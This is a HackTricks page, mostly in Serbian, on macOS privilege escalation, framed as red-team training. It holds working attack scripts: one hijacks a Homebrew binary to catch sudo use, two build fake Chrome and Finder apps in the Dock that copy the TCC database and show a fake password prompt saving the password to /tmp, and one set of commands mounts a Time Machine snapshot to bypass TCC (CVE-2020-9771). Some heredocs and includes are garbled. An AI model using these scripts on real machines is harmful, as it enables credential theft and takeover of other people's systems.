# macOS Privilege Escalation {% hint style="success" %} Learn & practice AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Learn & practice GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

{% endhint %} ## TCC Privilege Escalation Ako ste došli ovde tražeći TCC eskalaciju privilegija, idite na: {% content-ref url="macos-security-protections/macos-tcc/" %} [macos-tcc](macos-security-protections/macos-tcc/) {% endcontent-ref %} ## Linux Privesc Imajte na umu da **većina trikova o eskalaciji privilegija koji utiču na Linux/Unix će takođe uticati na MacOS** mašine. Tako da pogledajte: {% content-ref url="../../linux-hardening/privilege-escalation/" %} [privilege-escalation](../../linux-hardening/privilege-escalation/) {% endcontent-ref %} ## User Interaction ### Sudo Hijacking Možete pronaći originalnu [Sudo Hijacking tehniku unutar posta o Linux eskalaciji privilegija](../../linux-hardening/privilege-escalation/#sudo-hijacking). Međutim, macOS **održava** korisnikov **`PATH`** kada izvršava **`sudo`**. Što znači da bi drugi način za postizanje ovog napada bio da se **otmu drugi binarni fajlovi** koje žrtva još uvek izvršava kada **pokreće sudo:** ```bash # Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH cat > /opt/homebrew/bin/ls < /tmp/privesc fi /bin/ls "\$@" EOF chmod +x /opt/homebrew/bin/ls # victim sudo ls ``` Napomena da korisnik koji koristi terminal verovatno ima **Homebrew instaliran**. Tako da je moguće preuzeti binarne datoteke u **`/opt/homebrew/bin`**. ### Imitacija Dock-a Korišćenjem nekih **socijalnih inženjeringa** mogli biste **imitirati na primer Google Chrome** unutar dock-a i zapravo izvršiti svoj skript: {% tabs %} {% tab title="Imitacija Chrome-a" %} Neki predlozi: * Proverite u Dock-u da li postoji Chrome, i u tom slučaju **uklonite** tu stavku i **dodajte** **lažnu** **Chrome stavku na istu poziciju** u Dock nizu. ```bash #!/bin/sh # THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON) # If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%'; rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS mkdir -p /tmp/Google\ Chrome.app/Contents/Resources # Payload to execute cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c < #include #include int main() { char *cmd = "open /Applications/Google\\\\ Chrome.app & " "sleep 2; " "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); " "echo \$PASSWORD > /tmp/passwd.txt"; system(cmd); return 0; } EOF gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome # Info.plist cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist CFBundleExecutable Google Chrome CFBundleIdentifier com.google.Chrome CFBundleName Google Chrome CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Google Chrome cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0' sleep 0.1 killall Dock ``` {% endtab %} {% tab title="Finder Impersonacija" %} Neki predlozi: * Ne **možete ukloniti Finder iz Dock-a**, pa ako planirate da ga dodate u Dock, možete staviti lažni Finder odmah pored pravog. Za to treba da **dodate lažni Finder unos na početak Dock niza**. * Druga opcija je da ga ne stavljate u Dock i samo ga otvorite, "Finder traži da kontroliše Finder" nije tako čudno. * Još jedna opcija za **eskalaciju na root bez traženja** lozinke sa užasnom porukom, je da naterate Findera da stvarno traži lozinku za obavljanje privilegovane akcije: * Zatražite od Findera da kopira u **`/etc/pam.d`** novu **`sudo`** datoteku (Poruka koja traži lozinku će ukazati da "Finder želi da kopira sudo") * Zatražite od Findera da kopira novi **Authorization Plugin** (Možete kontrolisati ime datoteke tako da poruka koja traži lozinku ukazuje da "Finder želi da kopira Finder.bundle") ```bash #!/bin/sh # THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON) # If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%'; rm -rf /tmp/Finder.app/ 2>/dev/null # Create App structure mkdir -p /tmp/Finder.app/Contents/MacOS mkdir -p /tmp/Finder.app/Contents/Resources # Payload to execute cat > /tmp/Finder.app/Contents/MacOS/Finder.c < #include #include int main() { char *cmd = "open /System/Library/CoreServices/Finder.app & " "sleep 2; " "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); " "echo \$PASSWORD > /tmp/passwd.txt"; system(cmd); return 0; } EOF gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c chmod +x /tmp/Finder.app/Contents/MacOS/Finder # Info.plist cat << EOF > /tmp/Finder.app/Contents/Info.plist CFBundleExecutable Finder CFBundleIdentifier com.apple.finder CFBundleName Finder CFBundleVersion 1.0 CFBundleShortVersionString 1.0 CFBundleInfoDictionaryVersion 6.0 CFBundlePackageType APPL CFBundleIconFile app EOF # Copy icon from Finder cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns # Add to Dock defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Finder.app_CFURLStringType0' sleep 0.1 killall Dock ``` {% endtab %} {% endtabs %} ## TCC - Eskalacija privilegija za root ### CVE-2020-9771 - mount\_apfs TCC zaobilaženje i eskalacija privilegija **Bilo koji korisnik** (čak i oni bez privilegija) može kreirati i montirati snapshot vremenske mašine i **pristupiti SVIM datotekama** tog snapshot-a.\ **Jedina privilegija** koja je potrebna je da aplikacija koja se koristi (kao što je `Terminal`) ima **Pristup celom disku** (FDA) (`kTCCServiceSystemPolicyAllfiles`) koji mora odobriti administrator. {% code overflow="wrap" %} ```bash # Create snapshot tmutil localsnapshot # List snapshots tmutil listlocalsnapshots / Snapshots for disk /: com.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it cd /tmp # I didn it from this folder mkdir /tmp/snap # Mount it, "noowners" will mount the folder so the current user can access everything /sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it ls /tmp/snap/Users/admin_user # This will work ``` {% endcode %} Detaljnije objašnjenje može se [**pronaći u originalnom izveštaju**](https://theevilbit.github.io/posts/cve\_2020\_9771/)**.** ## Osetljive informacije Ovo može biti korisno za eskalaciju privilegija: {% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} [macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md) {% endcontent-ref %} {% hint style="success" %} Učite i vežbajte AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Učite i vežbajte GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Podrška HackTricks

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

{% endhint %}